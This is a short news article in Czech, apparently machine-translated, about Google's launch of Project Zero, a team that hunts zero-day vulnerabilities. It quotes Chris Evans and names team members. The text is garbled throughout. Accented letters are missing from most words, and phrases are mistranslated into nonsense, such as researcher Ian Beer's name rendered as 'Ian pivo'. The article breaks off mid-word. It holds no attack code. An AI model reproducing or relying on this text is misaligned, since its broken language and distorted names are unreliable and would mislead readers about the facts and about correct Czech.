Google oznmila sputn projektu Zero, specializovan intern tm, kter se bude soustedit na hledn zero-day zranitelnosti v Google je i software tetch stran tak, aby mohly bt oprava ne mt kodliv herci anci jejich zneuit. "Mli byste bt schopni pouvat web bez obav, e trestn in nebo sttem sponzorovan herec vyuvajc chyby v softwaru infikovat v pota, ukrst tajemstv, nebo sledovat vae komunikace, "poznamenal Chris Evans, bval f bezpenostn Chrome tmu spolenosti Google a nyn hlavn" vzkumnk past "pro Project Zero. Projekt je zamen na zlepen bezpenosti softwaru, kter m velkou uivatelskou zkladnu. "Budeme pouvat standardn pstupy, jako je vyhledvn a podvn zprv o velk mnostv zranitelnost. Dle budeme provdt nov vzkum Skutenosti sniujc zvanost rizika, vyuit, program, analza a nco jinho, e nai vdci rozhodnout, je vhodnou investici, "vysvtlil. V rozhovoru pro Wired , Evans odhalil dal (aktuln) leny tmu: George Hotz (aka "geohotovu"), slavn iPhone a PlayStation 3 hacker; a ti vdci plodn zabezpeen a chyb lovci, kte byli pijati intern: Tavis Ormandy, Ben Hawkes, a Ian pivo. Souasn cl je zskat minimln dalch est. "Zavazujeme se dlat nai prci transparentn," vysvtluje Evans. "Kad chyba se objev bude uloena v extern databzi. Budeme jen hlate chyby na prodejce a ne tetch stran Softwaru je. Jakmile zprva chyba se stane veejnosti (obvykle jednou oprava je k dispozici), b